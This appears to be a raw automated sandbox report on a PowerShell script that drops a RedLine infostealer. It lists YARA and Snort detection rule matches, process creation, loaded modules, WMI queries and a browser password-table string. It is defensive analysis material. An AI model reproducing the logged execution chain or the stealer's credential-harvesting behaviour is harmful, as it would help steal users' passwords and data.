Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000002.00000002.1330376208.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: powershell.exe PID: 8280, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: VZCXGHSDSD.exe PID: 8464, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: VZCXGHSDSD.exe PID: 8552, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026CD259 2_2_026CD259
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C2B01 2_2_026C2B01
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C0848 2_2_026C0848
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C21E8 2_2_026C21E8
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C7FF8 2_2_026C7FF8
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C4418 2_2_026C4418
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C7D38 2_2_026C7D38
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C3539 2_2_026C3539
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C52C8 2_2_026C52C8
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C52B8 2_2_026C52B8
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6B70 2_2_026C6B70
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C4328 2_2_026C4328
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6B80 2_2_026C6B80
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C0839 2_2_026C0839
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C7160 2_2_026C7160
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C2151 2_2_026C2151
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C713B 2_2_026C713B
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C61A0 2_2_026C61A0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C69A0 2_2_026C69A0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6990 2_2_026C6990
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C161F 2_2_026C161F
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C5E81 2_2_026C5E81
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C5E90 2_2_026C5E90
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C674B 2_2_026C674B
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6758 2_2_026C6758
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6F3A 2_2_026C6F3A
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C7FE9 2_2_026C7FE9
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6FCB 2_2_026C6FCB
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C2FD0 2_2_026C2FD0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026CC421 2_2_026CC421
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C7CE3 2_2_026C7CE3
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6540 2_2_026C6540
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 2_2_026C6550 2_2_026C6550
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_02F3E7B0 3_2_02F3E7B0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_02F3DC90 3_2_02F3DC90
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_06919628 3_2_06919628
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_06914468 3_2_06914468
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_06911210 3_2_06911210
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_06913320 3_2_06913320
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0691D108 3_2_0691D108
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0691DD00 3_2_0691DD00
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_07335440 3_2_07335440
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_073384F0 3_2_073384F0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_07333B30 3_2_07333B30
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0733C15D 3_2_0733C15D
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_07337188 3_2_07337188
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0733C1FB 3_2_0733C1FB
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_07330800 3_2_07330800
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000002.00000002.1330376208.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8280, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: VZCXGHSDSD.exe PID: 8464, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: VZCXGHSDSD.exe PID: 8552, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@7/51@1/3
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VZCXGHSDSD.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8572:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8320:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l44cex1f.2vx.ps1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003440000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, tmp96C0.tmp.3.dr, tmp575.tmp.3.dr, tmp3BEB.tmp.3.dr, tmp969E.tmp.3.dr, tmp3BEA.tmp.3.dr, tmp586.tmp.3.dr, tmp96AE.tmp.3.dr, tmp587.tmp.3.dr, tmp968D.tmp.3.dr, tmp597.tmp.3.dr, tmp967C.tmp.3.dr, tmp96AF.tmp.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: xenn.ps1 ReversingLabs: Detection: 13%
Source: xenn.ps1 Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xenn.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe"
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe"
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: wldp.dll Jump to behavior
